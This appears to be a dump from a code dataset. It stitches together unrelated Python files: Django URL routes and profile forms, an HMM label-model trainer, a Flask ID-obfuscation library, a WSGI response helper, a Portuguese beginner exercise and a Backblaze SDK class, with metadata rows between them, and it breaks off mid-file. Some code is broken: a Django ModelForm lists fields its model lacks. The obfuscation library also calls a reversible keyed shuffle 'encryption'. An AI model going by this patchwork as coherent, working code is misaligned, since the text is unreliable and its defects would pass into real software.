url(r'^$', views.index, name='index'),
url(r'^search', views.search, name='search'),
url(r'^submit/$', views.submit, name='submit'),
url(r'^show/(?P<area_id>\d+)/', views.show, name='show'),
)
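# Editor's note (not in the original file): django.conf.urls.patterns() was removed in
# Django 1.10, so on newer Django versions the same routing is written as a plain list,
# for example with re_path:
#
# from django.urls import re_path
# urlpatterns = [
#     re_path(r'^$', views.index, name='index'),
#     re_path(r'^search', views.search, name='search'),
#     re_path(r'^submit/$', views.submit, name='submit'),
#     re_path(r'^show/(?P<area_id>\d+)/', views.show, name='show'),
# ]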
| 31.727273
| 60
| 0.673352
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 84
| 0.240688
|
c4263856e2d9e9e21750aa2037ab8e37b21086eb
| 2,407
|
py
|
Python
|
apps/user/models.py
|
mrf-foundation/ckios_v1
|
3556a99ba5e01f00e137fd124903ace77d2cba28
|
[
"Apache-2.0"
] | null | null | null |
apps/user/models.py
|
mrf-foundation/ckios_v1
|
3556a99ba5e01f00e137fd124903ace77d2cba28
|
[
"Apache-2.0"
] | null | null | null |
apps/user/models.py
|
mrf-foundation/ckios_v1
|
3556a99ba5e01f00e137fd124903ace77d2cba28
|
[
"Apache-2.0"
] | null | null | null |
from django.db import models
from django import forms
from django.contrib.auth.models import User
from PIL import Image
from django.utils.timezone import now
class Profile(models.Model):
user = models.OneToOneField(User, null=True, blank=True, on_delete=models.CASCADE)
image = models.ImageField(upload_to="uploads",default="default/user.png")
def __str__(self):
return f'{self.user.username} Profile'
# Override the save method of the model
    def save(self, *args, **kwargs):
        super().save(*args, **kwargs)  # forward args so Django's save options still work
        img = Image.open(self.image.path)  # Open image
# resize image
if img.height > 300 or img.width > 300:
output_size = (300, 300)
img.thumbnail(output_size) # Resize image
img.save(self.image.path) # Save it again and override the larger image
## User Update Profile
class UpdateProfileForm(forms.ModelForm):
avatar = forms.ImageField(widget=forms.FileInput(attrs={'class': 'form-control-file'}))
bio = forms.CharField(widget=forms.Textarea(attrs={'class': 'form-control', 'rows': 5}))
website_url = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'rows': 1}))
facebook_url = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'rows': 1}))
instagram_url = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'rows': 1}))
twitter_url = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'rows': 1}))
    class Meta:
        model = Profile
        # NOTE: these names must exist as fields on Profile for the ModelForm to validate;
        # as declared above, Profile only defines `user` and `image`.
        fields = ['avatar', 'bio', 'website_url', 'facebook_url', 'twitter_url', 'instagram_url']
class UpdateUserForm(forms.ModelForm):
username = forms.CharField(max_length=100,
required=True,
widget=forms.TextInput(attrs={'class': 'form-control'}))
email = forms.EmailField(required=True,
widget=forms.TextInput(attrs={'class': 'form-control'}))
website_url = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'rows': 1}))
facebook_url = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'rows': 1}))
instagram_url = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'rows': 1}))
    class Meta:
        model = User
        # instagram_url/facebook_url are not fields on django's User model, so only the
        # real model fields are listed here; the extra URL fields remain plain form fields
        fields = ['username', 'email']
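# Editor's sketch (not part of the original app, and it would normally live in views.py):
# typical wiring of the two forms above into an update view. The template name and view
# name are illustrative assumptions, not taken from the project.
from django.shortcuts import render

def edit_profile(request):
    user_form = UpdateUserForm(request.POST or None, instance=request.user)
    profile_form = UpdateProfileForm(request.POST or None, request.FILES or None,
                                     instance=request.user.profile)
    if request.method == 'POST' and user_form.is_valid() and profile_form.is_valid():
        user_form.save()
        profile_form.save()
    return render(request, 'user/edit_profile.html',
                  {'user_form': user_form, 'profile_form': profile_form})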
| 44.574074
| 103
| 0.658912
| 2,218
| 0.921479
| 0
| 0
| 0
| 0
| 0
| 0
| 602
| 0.250104
|
c429c3cef7b7daf43f4b36c099ac1e6ca683a4ff
| 19,880
|
py
|
Python
|
slt/chmm/train.py
|
paper-submit-account/Sparse-CHMM
|
8a33dfe375a012cc0cc3324907135b74606a7b5d
|
[
"Apache-2.0"
] | null | null | null |
slt/chmm/train.py
|
paper-submit-account/Sparse-CHMM
|
8a33dfe375a012cc0cc3324907135b74606a7b5d
|
[
"Apache-2.0"
] | null | null | null |
slt/chmm/train.py
|
paper-submit-account/Sparse-CHMM
|
8a33dfe375a012cc0cc3324907135b74606a7b5d
|
[
"Apache-2.0"
] | null | null | null |
import os
import logging
import numpy as np
from typing import Optional
import torch
from torch.utils.data import DataLoader
from ..eval import Metric
from .dataset import CHMMBaseDataset
from .dataset import collate_fn as default_collate_fn
logger = logging.getLogger(__name__)
OUT_RECALL = 0.9
OUT_PRECISION = 0.8
class CHMMBaseTrainer:
def __init__(self,
config,
collate_fn=None,
training_dataset=None,
valid_dataset=None,
test_dataset=None,
pretrain_optimizer=None,
optimizer=None):
self._model = None
self._config = config
self._training_dataset = training_dataset
self._valid_dataset = valid_dataset
self._test_dataset = test_dataset
self._collate_fn = collate_fn
self._pretrain_optimizer = pretrain_optimizer
self._optimizer = optimizer
self._init_state_prior = None
self._init_trans_mat = None
self._init_emiss_mat = None
@property
def config(self):
return self._config
@config.setter
def config(self, x):
logger.warning("Updating DirCHMMTrainer.config")
self._config = x
@property
def model(self):
return self._model
def initialize_trainer(self):
"""
Initialize necessary components for training
Note: Better not change the order
Returns
-------
the initialized trainer
"""
self.initialize_matrices()
self.initialize_model()
self.initialize_optimizers()
return self
def initialize_model(self):
raise NotImplementedError
def initialize_matrices(self):
"""
Initialize <HMM> transition and emission matrices
Returns
-------
self
"""
assert self._training_dataset and self._valid_dataset
# inject prior knowledge about transition and emission
self._init_state_prior = torch.zeros(self._config.d_hidden, device=self._config.device) + 1e-2
self._init_state_prior[0] += 1 - self._init_state_prior.sum()
intg_obs = list(map(np.array, self._training_dataset.obs + self._valid_dataset.obs))
# construct/load initial transition matrix
dataset_dir = os.path.split(self._config.train_path)[0]
transmat_path = os.path.join(dataset_dir, "init_transmat.pt")
if getattr(self._config, "load_init_mat", False):
if os.path.isfile(transmat_path):
logger.info("Loading initial transition matrix from disk")
self._init_trans_mat = torch.load(transmat_path)
# if the loaded transmat does not have the proper shape, re-calculate it.
s0_transmat, s1_transmat = self._init_trans_mat.shape
if not (s0_transmat == s1_transmat == self.config.d_obs):
self._init_trans_mat = None
if self._init_trans_mat is None:
self._init_trans_mat = torch.tensor(initialise_transmat(
observations=intg_obs, label_set=self._config.bio_label_types
)[0], dtype=torch.float)
if getattr(self._config, "save_init_mat", False):
logger.info("Saving initial transition matrix")
torch.save(self._init_trans_mat, transmat_path)
# construct/load initial emission matrix
emissmat_path = os.path.join(dataset_dir, "init_emissmat.pt")
if getattr(self._config, "load_init_mat", False):
if os.path.isfile(emissmat_path):
logger.info("Loading initial emission matrix from disk")
self._init_emiss_mat = torch.load(emissmat_path)
# if the loaded emissmat does not have the proper shape, re-calculate it.
s0_emissmat, s1_emissmat, s2_emissmat = self._init_emiss_mat.shape
                if not (s0_emissmat == self.config.n_src and s1_emissmat == s2_emissmat == self.config.d_obs):
self._init_emiss_mat = None
if self._init_emiss_mat is None:
self._init_emiss_mat = torch.tensor(initialise_emissions(
observations=intg_obs, label_set=self._config.bio_label_types,
sources=self._config.sources, src_priors=self._config.src_priors
)[0], dtype=torch.float)
if getattr(self._config, "save_init_mat", False):
logger.info("Saving initial emission matrix")
torch.save(self._init_emiss_mat, emissmat_path)
return self
def initialize_optimizers(self, optimizer=None, pretrain_optimizer=None):
self._optimizer = self.get_optimizer() if optimizer is None else optimizer
self._pretrain_optimizer = self.get_pretrain_optimizer() if pretrain_optimizer is None else pretrain_optimizer
def get_dataloader(self, dataset, shuffle=False):
if dataset is not None:
dataloader = DataLoader(
dataset=dataset,
batch_size=self._config.lm_batch_size,
collate_fn=self._collate_fn if self._collate_fn is not None else default_collate_fn,
shuffle=shuffle,
drop_last=False
)
return dataloader
else:
logger.error('Dataset is not defined')
raise ValueError("Dataset is not defined!")
def pretrain_step(self, data_loader, optimizer, trans_, emiss_):
raise NotImplementedError
def training_step(self, data_loader, optimizer):
raise NotImplementedError
def train(self):
raise NotImplementedError
def valid(self) -> Metric:
self._model.to(self._config.device)
valid_metrics = self.evaluate(self._valid_dataset)
logger.info("Validation results:")
for k, v in valid_metrics.items():
logger.info(f" {k}: {v:.4f}")
return valid_metrics
def test(self) -> Metric:
self._model.to(self._config.device)
test_metrics = self.evaluate(self._test_dataset)
logger.info("Test results:")
for k, v in test_metrics.items():
logger.info(f" {k}: {v:.4f}")
return test_metrics
def evaluate(self, dataset: CHMMBaseDataset):
raise NotImplementedError
def predict(self, dataset: CHMMBaseDataset):
raise NotImplementedError
def get_pretrain_optimizer(self):
raise NotImplementedError
def get_optimizer(self):
# ----- initialize optimizer -----
raise NotImplementedError
def save(self,
output_dir: Optional[str] = None,
save_optimizer: Optional[bool] = False,
model_name: Optional[str] = 'chmm',
optimizer_name: Optional[str] = 'chmm-optimizer',
pretrain_optimizer_name: Optional[str] = 'chmm-pretrain-optimizer'):
"""
Save model parameters as well as trainer parameters
Parameters
----------
output_dir: model directory
save_optimizer: whether to save optimizer
model_name: model name (suffix free)
optimizer_name: optimizer name (suffix free)
pretrain_optimizer_name: pretrain optimizer name (suffix free)
Returns
-------
None
"""
output_dir = output_dir if output_dir is not None else self._config.output_dir
logger.info(f"Saving model to {output_dir}")
model_state_dict = self._model.state_dict()
torch.save(model_state_dict, os.path.join(output_dir, f'{model_name}.bin'))
self._config.save(output_dir)
if save_optimizer:
logger.info("Saving optimizer and scheduler")
torch.save(self._optimizer.state_dict(),
os.path.join(output_dir, f"{optimizer_name}.bin"))
torch.save(self._pretrain_optimizer.state_dict(),
os.path.join(output_dir, f"{pretrain_optimizer_name}.bin"))
return None
def load(self,
input_dir: Optional[str] = None,
load_optimizer: Optional[bool] = False,
model_name: Optional[str] = 'chmm',
optimizer_name: Optional[str] = 'chmm-optimizer',
pretrain_optimizer_name: Optional[str] = 'chmm-pretrain-optimizer'):
"""
Load model parameters.
Parameters
----------
input_dir: model directory
load_optimizer: whether load other trainer parameters
model_name: model name (suffix free)
optimizer_name: optimizer name (suffix free)
pretrain_optimizer_name: pretrain optimizer name (suffix free)
Returns
-------
self
"""
input_dir = input_dir if input_dir is not None else self._config.output_dir
if self._model is not None:
logger.warning(f"The original model {type(self._model)} in {type(self)} is not None. "
f"It will be overwritten by the loaded model!")
logger.info(f"Loading model from {input_dir}")
self.initialize_model()
self._model.load_state_dict(torch.load(os.path.join(input_dir, f'{model_name}.bin')))
self._model.to(self.config.device)
if load_optimizer:
logger.info("Loading optimizer and scheduler")
if self._optimizer is None:
self.initialize_optimizers()
if os.path.isfile(os.path.join(input_dir, f"{optimizer_name}.bin")):
self._optimizer.load_state_dict(
torch.load(os.path.join(input_dir, f"{optimizer_name}.bin"), map_location=self.config.device)
)
else:
logger.warning("Optimizer file does not exist!")
if os.path.isfile(os.path.join(input_dir, f"{pretrain_optimizer_name}.bin")):
self._pretrain_optimizer.load_state_dict(
torch.load(os.path.join(input_dir, f"{pretrain_optimizer_name}.bin"))
)
else:
logger.warning("Pretrain optimizer file does not exist!")
return self
def save_results(self,
output_dir: str,
valid_results: Optional[Metric] = None,
file_name: Optional[str] = 'results',
disable_final_valid: Optional[bool] = False,
disable_test: Optional[bool] = False,
disable_inter_results: Optional[bool] = False) -> None:
"""
Save training (validation) results
Parameters
----------
output_dir: output directory, should be a folder
valid_results: validation results during the training process
file_name: file name
disable_final_valid: disable final validation process (getting validation results of the trained model)
disable_test: disable test process
disable_inter_results: do not save inter-results
Returns
-------
None
"""
if not disable_final_valid:
logger.info("Getting final validation metrics")
valid_metrics = self.valid()
else:
valid_metrics = None
if not disable_test:
logger.info("Getting test metrics.")
test_metrics = self.test()
else:
test_metrics = None
# write validation and test results
result_file = os.path.join(output_dir, f'{file_name}.txt')
logger.info(f"Writing results to {result_file}")
self.write_result(file_path=result_file,
valid_results=valid_results,
final_valid_metrics=valid_metrics,
test_metrics=test_metrics)
if not disable_inter_results:
# save validation inter results
logger.info(f"Saving inter results")
inter_result_file = os.path.join(output_dir, f'{file_name}-inter.pt')
torch.save(valid_results.__dict__, inter_result_file)
return None
@staticmethod
def write_result(file_path: str,
valid_results: Optional[Metric] = None,
final_valid_metrics: Optional[Metric] = None,
test_metrics: Optional[Metric] = None) -> None:
"""
Support functions for saving training results
Parameters
----------
file_path: where to save results
valid_results: validation results during the training process
final_valid_metrics: validation results of the trained model
test_metrics
Returns
-------
"""
with open(file_path, 'w') as f:
if valid_results is not None:
for i in range(len(valid_results)):
f.write(f"[Epoch {i + 1}]\n")
for k in ['precision', 'recall', 'f1']:
f.write(f" {k}: {valid_results[k][i]:.4f}")
f.write("\n")
if final_valid_metrics is not None:
f.write(f"[Best Validation]\n")
for k in ['precision', 'recall', 'f1']:
f.write(f" {k}: {final_valid_metrics[k]:.4f}")
f.write("\n")
if test_metrics is not None:
f.write(f"[Test]\n")
for k in ['precision', 'recall', 'f1']:
f.write(f" {k}: {test_metrics[k]:.4f}")
f.write("\n")
return None
def initialise_startprob(observations,
label_set,
src_idx=None):
"""
    calculate initial hidden states (not used in our setup since our sequences all begin from
    [CLS], which corresponds to hidden state "O").
:param src_idx: source index
:param label_set: a set of all possible label_set
:param observations: n_instances X seq_len X n_src X d_obs
:return: probabilities for the initial hidden states
"""
n_src = observations[0].shape[1]
logger.info("Constructing start distribution prior...")
init_counts = np.zeros((len(label_set),))
if src_idx is not None:
for obs in observations:
init_counts[obs[0, src_idx].argmax()] += 1
else:
for obs in observations:
for z in range(n_src):
init_counts[obs[0, z].argmax()] += 1
for i, label in enumerate(label_set):
if i == 0 or label.startswith("B-"):
init_counts[i] += 1
startprob_prior = init_counts + 1
startprob_ = np.random.dirichlet(init_counts + 1E-10)
return startprob_, startprob_prior
# TODO: try to use a more reliable source to start the transition and emission
def initialise_transmat(observations,
label_set,
src_idx=None):
"""
initialize transition matrix
:param src_idx: the index of the source of which the transition statistics is computed.
If None, use all sources
:param label_set: a set of all possible label_set
:param observations: n_instances X seq_len X n_src X d_obs
:return: initial transition matrix and transition counts
"""
logger.info("Constructing transition matrix prior...")
n_src = observations[0].shape[1]
trans_counts = np.zeros((len(label_set), len(label_set)))
if src_idx is not None:
for obs in observations:
for k in range(0, len(obs) - 1):
trans_counts[obs[k, src_idx].argmax(), obs[k + 1, src_idx].argmax()] += 1
else:
for obs in observations:
for k in range(0, len(obs) - 1):
for z in range(n_src):
trans_counts[obs[k, z].argmax(), obs[k + 1, z].argmax()] += 1
# update transition matrix with prior knowledge
for i, label in enumerate(label_set):
if label.startswith("B-") or label.startswith("I-"):
trans_counts[i, label_set.index("I-" + label[2:])] += 1
elif i == 0 or label.startswith("I-"):
for j, label2 in enumerate(label_set):
if j == 0 or label2.startswith("B-"):
trans_counts[i, j] += 1
transmat_prior = trans_counts + 1
# initialize transition matrix with dirichlet distribution
transmat_ = np.vstack([np.random.dirichlet(trans_counts2 + 1E-10)
for trans_counts2 in trans_counts])
return transmat_, transmat_prior
def initialise_emissions(observations,
label_set,
sources,
src_priors,
strength=1000):
"""
initialize emission matrices
:param sources: source names
:param src_priors: source priors
:param label_set: a set of all possible label_set
:param observations: n_instances X seq_len X n_src X d_obs
    :param strength: scaling factor applied to the emission probabilities to obtain the prior counts
    :return: initial emission probabilities and the corresponding prior counts
"""
logger.info("Constructing emission probabilities...")
obs_counts = np.zeros((len(sources), len(label_set)), dtype=np.float64)
# extract the total number of observations for each prior
for obs in observations:
obs_counts += obs.sum(axis=0)
for source_index, source in enumerate(sources):
# increase p(O)
obs_counts[source_index, 0] += 1
# increase the "reasonable" observations
for pos_index, pos_label in enumerate(label_set[1:]):
if pos_label[2:] in src_priors[source]:
obs_counts[source_index, pos_index] += 1
# construct probability distribution from counts
obs_probs = obs_counts / (obs_counts.sum(axis=1, keepdims=True) + 1E-3)
# initialize emission matrix
matrix = np.zeros((len(sources), len(label_set), len(label_set)))
for source_index, source in enumerate(sources):
for pos_index, pos_label in enumerate(label_set):
# Simple case: set P(O=x|Y=x) to be the recall
recall = 0
if pos_index == 0:
recall = OUT_RECALL
elif pos_label[2:] in src_priors[source]:
_, recall = src_priors[source][pos_label[2:]]
matrix[source_index, pos_index, pos_index] = recall
for pos_index2, pos_label2 in enumerate(label_set):
if pos_index2 == pos_index:
continue
elif pos_index2 == 0:
precision = OUT_PRECISION
elif pos_label2[2:] in src_priors[source]:
precision, _ = src_priors[source][pos_label2[2:]]
else:
precision = 1.0
# Otherwise, we set the probability to be inversely proportional to the precision
# and the (unconditional) probability of the observation
error_prob = (1 - recall) * (1 - precision) * (0.001 + obs_probs[source_index, pos_index2])
# We increase the probability for boundary errors (i.e. I-ORG -> B-ORG)
if pos_index > 0 and pos_index2 > 0 and pos_label[2:] == pos_label2[2:]:
error_prob *= 5
# We increase the probability for errors with same boundary (i.e. I-ORG -> I-GPE)
if pos_index > 0 and pos_index2 > 0 and pos_label[0] == pos_label2[0]:
error_prob *= 2
matrix[source_index, pos_index, pos_index2] = error_prob
error_indices = [i for i in range(len(label_set)) if i != pos_index]
error_sum = matrix[source_index, pos_index, error_indices].sum()
matrix[source_index, pos_index, error_indices] /= (error_sum / (1 - recall) + 1E-5)
emission_priors = matrix * strength
emission_probs = matrix
return emission_probs, emission_priors
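# Editor's sketch (not part of the original module): a tiny smoke test of the two
# initialisers above with dummy BIO labels, a single labelling source and one-hot
# observations. The source name and its (precision, recall) prior are made-up values
# used purely for illustration.
if __name__ == '__main__':
    _labels = ['O', 'B-PER', 'I-PER']
    _obs = [np.eye(3)[[0, 1, 2, 0]][:, None, :], np.eye(3)[[0, 0, 1, 2]][:, None, :]]
    _transmat, _ = initialise_transmat(observations=_obs, label_set=_labels)
    assert np.allclose(_transmat.sum(axis=1), 1.0)  # every row is a Dirichlet draw
    _emiss, _ = initialise_emissions(
        observations=_obs, label_set=_labels,
        sources=['toy_source'], src_priors={'toy_source': {'PER': (0.8, 0.9)}},
    )
    print(_transmat.shape, _emiss.shape)  # (3, 3) (1, 3, 3)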
| 38.452611
| 118
| 0.604326
| 13,235
| 0.665744
| 0
| 0
| 1,678
| 0.084406
| 0
| 0
| 5,679
| 0.285664
|
c42c480ac786f98d925a893f66e8658af5b8de1c
| 6,881
|
py
|
Python
|
flask_obfuscateids/lib.py
|
mlenzen/flask-obfuscateids
|
22319633b2685f2969bd67eae3fd09d2db6567f1
|
[
"BSD-3-Clause"
] | null | null | null |
flask_obfuscateids/lib.py
|
mlenzen/flask-obfuscateids
|
22319633b2685f2969bd67eae3fd09d2db6567f1
|
[
"BSD-3-Clause"
] | 1
|
2015-01-26T06:23:12.000Z
|
2015-01-26T06:23:12.000Z
|
flask_obfuscateids/lib.py
|
mlenzen/flask-obfuscateids
|
22319633b2685f2969bd67eae3fd09d2db6567f1
|
[
"BSD-3-Clause"
] | null | null | null |
from random import Random
from collections_extended import setlist
# The version of seeding to use for random
SEED_VERSION = 2
# Common alphabets to use
ALPHANUM = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
BASE58 = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
def shuffle(key, x):
random = Random(key)
random.shuffle(x)
def key_gen(key, base):
'''Generate values from the key.
This will indefinitely generate integers in [0, base).
key is used to initialize random, so that the "random" number generated are
the same each time for a given key. This turns a key of any length into an
"infinitely" long key without simply cycling over the key.
'''
random = Random(key)
while True:
value = random.randint(0, base-1)
yield value
def encode_base_n(num, base, min_length=0):
'''Convert an integer into a list of integers storing the number in base base.
If a minimum length is specified, the result will be 0-padded.
'''
out = []
while num > 0 or len(out) < min_length:
num, remainder = divmod(num, base)
out.append(remainder)
return out
def decode_base_n(int_list, base):
'''Convert a list of numbers representing a number in base base to an integer.'''
out = 0
for index, num in enumerate(int_list):
if num >= base or num < 0:
raise ValueError
out += (base ** index) * num
return out
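# Editor's note (not part of the original module): encode_base_n returns its digits in
# little-endian order, so decode_base_n is its exact inverse, e.g.:
#   encode_base_n(255, 16)            -> [15, 15]
#   decode_base_n([15, 15], 16)       -> 255
#   encode_base_n(5, 2, min_length=8) -> [1, 0, 1, 0, 0, 0, 0, 0]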
def calc_check_digits(int_list, base, num_check_chars):
checksum_base = base ** num_check_chars
checksum_value = sum(int_list) % checksum_base
return encode_base_n(checksum_value, base, min_length=num_check_chars)
def add_check_digits(int_list, base, num_check_chars):
'''Calculate a checksum for int_list and translate into a number of base base
made up of num_check_chars digits.
Args:
int_list: A list of integers >= 0 and < base
base: The number of characters in the alphabet
num_check_chars: The number of check characters to return
Returns:
A list of integers that represent the checksum in base base.
'''
check_digits = calc_check_digits(int_list, base, num_check_chars)
return int_list + check_digits
def eval_check_digits(decrypted_ints, base, num_check_chars):
'''Evaluate the check digits in decrypted_ints.
Args:
decrypted_ints: A list of integers >=0 and < base (the result of add_check_digits)
Returns:
The decrypted_ints without the check digits
Raises:
ValueError: if the check digits don't match
'''
if num_check_chars == 0:
return decrypted_ints
int_list = decrypted_ints[:-num_check_chars]
check_digits = decrypted_ints[-num_check_chars:]
if calc_check_digits(int_list, base, num_check_chars) != check_digits:
raise ValueError()
return int_list
def encode(int_list, alphabet):
'''Encode ints using alphabet.'''
char_list = []
for i in int_list:
        if i >= len(alphabet) or i < 0:
raise ValueError
char_list.append(alphabet[i])
return ''.join(char_list)
def decode(s, alphabet):
'''Decode a string s using alphabet returning a list of ints.'''
try:
return [alphabet.index(c) for c in s]
except (TypeError, IndexError):
raise ValueError
def encrypt(int_list, key, base):
encrypted_ints = []
moving_value = 0
for char_index, key_value in zip(int_list, key_gen(key, base)):
encrypted_int = (char_index + key_value + moving_value) % base
encrypted_ints.append(encrypted_int)
moving_value += encrypted_int
return encrypted_ints
def decrypt(int_list, key, base):
decrypted_ints = []
moving_value = 0
for char_index, key_value in zip(int_list, key_gen(key, base)):
decrypted_int = (char_index - key_value - moving_value) % base
decrypted_ints.append(decrypted_int)
moving_value += char_index
return decrypted_ints
def obfuscate(num, key, alphabet, min_chars=0, num_check_chars=1):
''' Obfuscate num using key.
This does some minor encryption by adding values to a key and a moving value.
The moving value is so that one small change makes all of the resulting
characters change.
Args:
num: The integer to obfuscate
key: An int, string or bytes to generate key values (anything that can be passed to random.seed)
alphabet: A list of characters to use for the alphabet
min_chars: A minimum number of chars for the resulting string
num_check_chars: The number of chars to use as a check
Returns:
A string encoding the number in the passed alphabet and encrypted with key.
Raises:
ValueError: if num is not a number or < 0
'''
try:
if num < 0:
raise ValueError()
except TypeError:
raise ValueError()
base = len(alphabet)
num_as_ints = encode_base_n(num, base, min_chars)
unencrypted_digits = add_check_digits(num_as_ints, base, num_check_chars)
encrypted_digits = encrypt(unencrypted_digits, key, base)
return encode(encrypted_digits, alphabet)
def deobfuscate(s, key, alphabet, num_check_chars=1):
'''Deobfuscate a string using key and alphabet.
key, alphabet and num_check_chars must be identical to the values used to obfuscate.
Args:
s: The string to deobfuscate
key: The key used to obfuscate
alphabet: The alphabet used to obfuscate
num_check_chars: The number of chars to use as a check
Returns:
The deobfuscated integer.
Raises:
ValueError: if s isn't a string, s doesn't use alphabet or the checksum doesn't match
'''
base = len(alphabet)
encrypted_ints = decode(s, alphabet)
decrypted_ints = decrypt(encrypted_ints, key, base)
num_as_ints = eval_check_digits(decrypted_ints, base, num_check_chars)
return decode_base_n(num_as_ints, base)
class Obfuscator():
def __init__(self, key, alphabet=None, min_length=0, num_check_chars=1, version=1):
'''
This accepts a version number in case the algorithm changes at some point
in the future.
Args:
key: The key.
alphabet: Optionally, specify an alternative alphabet to use.
min_length: An encoded value will always be at least min_length
characters (including the check characters)
num_check_chars: The number of chars used for the check
version: The version of the algorithm to use.
'''
if isinstance(num_check_chars, int) and num_check_chars >= 0:
self.num_check_chars = num_check_chars
else:
raise ValueError('num_check_chars must be an int >= 0')
if isinstance(min_length, int) and min_length >= 0:
self.min_length = min_length - num_check_chars
else:
raise ValueError('min_length must be an int >= 0')
self.key = key
alphabet = list(alphabet or ALPHANUM)
shuffle(key, alphabet)
self.alphabet = setlist(alphabet)
def obfuscate(self, num, salt=None, min_length=None):
if salt:
key = self.key + salt
else:
key = self.key
if min_length is None:
min_length = self.min_length
return obfuscate(num, key, self.alphabet, min_length, self.num_check_chars)
def deobfuscate(self, s, salt=None):
if salt:
key = self.key + salt
else:
key = self.key
return deobfuscate(s, key, self.alphabet, self.num_check_chars)
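# Editor's sketch (not part of the original module): round-tripping an id through the
# Obfuscator class above. The key and id are arbitrary illustration values.
if __name__ == '__main__':
    obf = Obfuscator(key='example-secret-key', alphabet=BASE58, min_length=8)
    token = obf.obfuscate(12345)
    assert obf.deobfuscate(token) == 12345
    print(12345, '->', token)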
| 30.312775
| 98
| 0.748874
| 1,402
| 0.203749
| 416
| 0.060456
| 0
| 0
| 0
| 0
| 3,031
| 0.440488
|
c42c74470081e712e5a554684e5bb789162adcd2
| 377
|
py
|
Python
|
lib/response.py
|
dpla/akara
|
432f14782152dd19931bdbd8f9fad19b5932426d
|
[
"Apache-2.0"
] | 5
|
2015-01-30T03:50:37.000Z
|
2015-09-23T00:46:11.000Z
|
lib/response.py
|
dpla/akara
|
432f14782152dd19931bdbd8f9fad19b5932426d
|
[
"Apache-2.0"
] | null | null | null |
lib/response.py
|
dpla/akara
|
432f14782152dd19931bdbd8f9fad19b5932426d
|
[
"Apache-2.0"
] | 3
|
2015-03-09T19:16:56.000Z
|
2019-09-19T02:41:29.000Z
|
"""Information for the outgoing response
code - the HTTP response code (default is "200 Ok")
headers - a list of key/value pairs used for the WSGI start_response
"""
code = None
headers = []
def add_header(key, value):
"""Helper function to append (key, value) to the list of response headers"""
headers.append( (key, value) )
# Eventually add cookie support?
| 23.5625
| 80
| 0.700265
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 279
| 0.740053
|
c42d5c2686fc626989593bdff74f807903b98683
| 1,594
|
py
|
Python
|
parte 3/desafio93.py
|
BrunoSoares-DEV/Exercicios-python
|
fcfd0a7b3e2c6af2b7dd8e5a15ca6585c97f7c67
|
[
"MIT"
] | 2
|
2021-02-24T20:05:24.000Z
|
2021-02-24T20:05:41.000Z
|
parte 3/desafio93.py
|
BrunoSoares-DEV/Exercicios-python
|
fcfd0a7b3e2c6af2b7dd8e5a15ca6585c97f7c67
|
[
"MIT"
] | null | null | null |
parte 3/desafio93.py
|
BrunoSoares-DEV/Exercicios-python
|
fcfd0a7b3e2c6af2b7dd8e5a15ca6585c97f7c67
|
[
"MIT"
] | null | null | null |
jog = {}
# collect the input data
jog['Nome do jogador'] = str(input('Digite o nome do jogador: ')).strip().title()
jog['Total partidas'] = int(input('Quantas partidas jogou: '))
# list of goals
gols = []
# how many goals in each match
for i in range(0, jog['Total partidas']):
gols.append(int(input(f'Quantos gols na partida {i}°: ')))
# total goals
totGols = 0
for g in gols:
totGols += g
#print(totGols)
# add the results to the dictionary
jog['Total gols'] = totGols
jog['Gols em partidas'] = gols
#print(jog)
# show the results
print(f'O jogador: {jog["Nome do jogador"]}, jogou {jog["Total partidas"]} partidas e '
f'marcou ao todo no campeonato {jog["Total gols"]} gols')
print('Partidas:')
for pos, v in enumerate(gols):
print(f'Partida {pos}: {v} gols')
'''
This program analyses a player's statistics.
First we create an empty dictionary, jog, and ask the user for the player's name and the total number of matches.
An empty list called gols is created, and a for loop (from 0 up to the total number of matches) asks how many goals were scored in each match.
On every iteration the value is appended to the gols list.
A control variable totGols starts at zero and, inside a for loop where g iterates over gols, totGols accumulates g, summing all the goals.
Next the entries 'Total gols' and 'Gols em partidas' are added to the dictionary, using totGols and gols respectively.
The print shows the results, and finally a loop with pos and v over enumerate(gols) prints the goals scored in each match.
'''
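# Editor's note (not part of the original exercise): the manual accumulation loop above
# can be written more idiomatically with the built-in sum(), e.g.:
#   jog['Total gols'] = sum(gols)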
| 37.952381
| 161
| 0.717064
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,317
| 0.820561
|
c42d617d9e6dd57810d5d84da656ddd4e8d82bf1
| 5,891
|
py
|
Python
|
b2sdk/v1/account_info.py
|
ehossack/b2-sdk-python
|
034bec38671c0862b6956915993061359dbd51f6
|
[
"MIT"
] | null | null | null |
b2sdk/v1/account_info.py
|
ehossack/b2-sdk-python
|
034bec38671c0862b6956915993061359dbd51f6
|
[
"MIT"
] | null | null | null |
b2sdk/v1/account_info.py
|
ehossack/b2-sdk-python
|
034bec38671c0862b6956915993061359dbd51f6
|
[
"MIT"
] | null | null | null |
######################################################################
#
# File: b2sdk/v1/account_info.py
#
# Copyright 2021 Backblaze Inc. All Rights Reserved.
#
# License https://www.backblaze.com/using_b2_code.html
#
######################################################################
from abc import abstractmethod
import inspect
import logging
import os
from typing import Optional
from b2sdk import _v2 as v2
from b2sdk.account_info.sqlite_account_info import DEFAULT_ABSOLUTE_MINIMUM_PART_SIZE
from b2sdk.utils import limit_trace_arguments
logger = logging.getLogger(__name__)
# Retain legacy get_minimum_part_size and facilitate for optional s3_api_url
class OldAccountInfoMethods:
REALM_URLS = v2.REALM_URLS
@limit_trace_arguments(
only=[
'self',
'api_url',
'download_url',
'minimum_part_size',
'realm',
's3_api_url',
]
)
def set_auth_data(
self,
account_id,
auth_token,
api_url,
download_url,
minimum_part_size,
application_key,
realm,
allowed=None,
application_key_id=None,
s3_api_url=None,
):
if 's3_api_url' in inspect.getfullargspec(self._set_auth_data).args:
s3_kwargs = dict(s3_api_url=s3_api_url)
else:
s3_kwargs = {}
if allowed is None:
allowed = self.DEFAULT_ALLOWED
assert self.allowed_is_valid(allowed)
